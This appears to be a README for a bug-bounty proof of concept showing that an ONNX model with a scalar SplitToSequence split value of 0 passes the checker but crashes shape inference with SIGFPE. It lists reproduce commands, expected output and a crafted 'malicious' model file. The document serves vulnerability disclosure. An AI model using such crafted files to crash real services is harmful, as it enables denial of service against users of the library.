---
license: mit
tags:
  - security
  - onnx
  - model-file-format
  - poc
  - huntr
---

# ONNX SplitToSequence scalar split=0 SIGFPE PoC

This repository contains the proof of concept and evidence files for an ONNX
`SplitToSequence` shape-inference crash.

## Summary

A checker-passing ONNX model can set the optional `SplitToSequence` `split`
input to a scalar `INT32` initializer with value `0`. ONNX shape inference then
evaluates `splitDimValue % splitSizes[0]` in native code without checking that
the scalar split value is positive. This terminates the process with `SIGFPE`.

Tested package:

```text
onnx==1.22.0
numpy==1.26.4
```

## Reproduce

```bash
python3 -m venv /tmp/onnx-split-poc
/tmp/onnx-split-poc/bin/python -m pip install --upgrade pip
/tmp/onnx-split-poc/bin/python -m pip install -r requirements.txt
/tmp/onnx-split-poc/bin/python onnx_split_to_sequence_zero_split_sigfpe_poc.py --out-dir /tmp/onnx-split-poc-output
```

Expected result:

```text
== control_split_2.onnx split=2 ==
loaded=control_split_2.onnx
checker_passed
shape_inference_returned
returncode=0

== malicious_split_0.onnx split=0 ==
loaded=malicious_split_0.onnx
checker_passed
Fatal Python error: Floating point exception
...
returncode=-8
```

For native debugger capture:

```bash
gdb --args /tmp/onnx-split-poc/bin/python onnx_split_to_sequence_zero_split_sigfpe_poc.py --out-dir /tmp/onnx-split-poc-output --direct-crash
```

## Files

- `onnx_split_to_sequence_zero_split_sigfpe_poc.py` - repeatable PoC.
- `control_split_2.onnx` - valid control model using scalar `split=2`.
- `malicious_split_0.onnx` - checker-passing crash model using scalar `split=0`.
- `record-demo-output.txt` - recorded PoC output.
- `gdb-backtrace.txt` - native backtrace showing `SIGFPE`.
- `source-sequence-utils-v1.22.0.txt` - vulnerable release source snippet.
- `source-sequence-utils-main.txt` - current `main` source snippet.
- `duplicate-check.md` - public duplicate check notes.
- `duplicate-check-playwright.json` - raw Huntr dedup checker output.
- `environment.txt` - tested environment.
- `SHA256SUMS.txt` - file hashes.